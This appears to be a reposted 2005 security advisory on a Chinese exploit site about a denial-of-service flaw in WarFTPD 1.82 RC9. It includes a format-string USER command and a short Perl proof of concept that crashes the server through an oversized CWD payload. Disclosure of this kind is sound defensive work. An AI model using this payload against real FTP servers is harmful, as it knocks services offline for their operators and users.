首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Denial of Service Vulnerability in WarFTPD
来源:vfocus.net 作者:MC.Iglo 发布时间:2005-02-27  

Denial of Service Vulnerability in WarFTPD

Summary
WarFTPD is "popular FTP Daemon for 32bit Windows".

A DoS vulnerability has been found in WarFTPD when running as a system service. If the FTP server is fed with a maliciously crafted pathname, it will crash with an Access Violation error.

Credit:
The information has been provided by MC.Iglo.

Details
Vulnerable Systems:
* WarFTP Daemon version 1.82 RC9

Immune Systems:
* WarFTP Daemon version 1.82.00 RC10

Exploit:
Commands such as "USER %9999999999d%9999999999d%999999999999d" will cause WarFTPD to consume a lot of CPU and memory.

Proof of Concept:
#!/usr/bin/perl -w
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
use strict;
use Net::FTP;
my $payload="%s"x115;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("anonymous","123@victim.com");
$ftp->quot("CWD",$payload);

Vendor Status:
Patched version released (available for download here .)



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Multiple Vulnerabilities in We
·BadBlue Easy File Sharing Remo
·AWStats 6.x pluginmode Multipl
·BadBlue mfcisapicommand Remote
·Avaya IP Office Phone Manager
·phpBB 2.0.x Session Handling A
·WebConnect Directory Traversal
·AWStats 6.x Multiple Remote Co
·Apache Win32 Chunked Encoding
·Trillian Basic 3.0 PNG Images
·AOL Instant Messenger goaway O
·TrackerCam PHP Argument Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved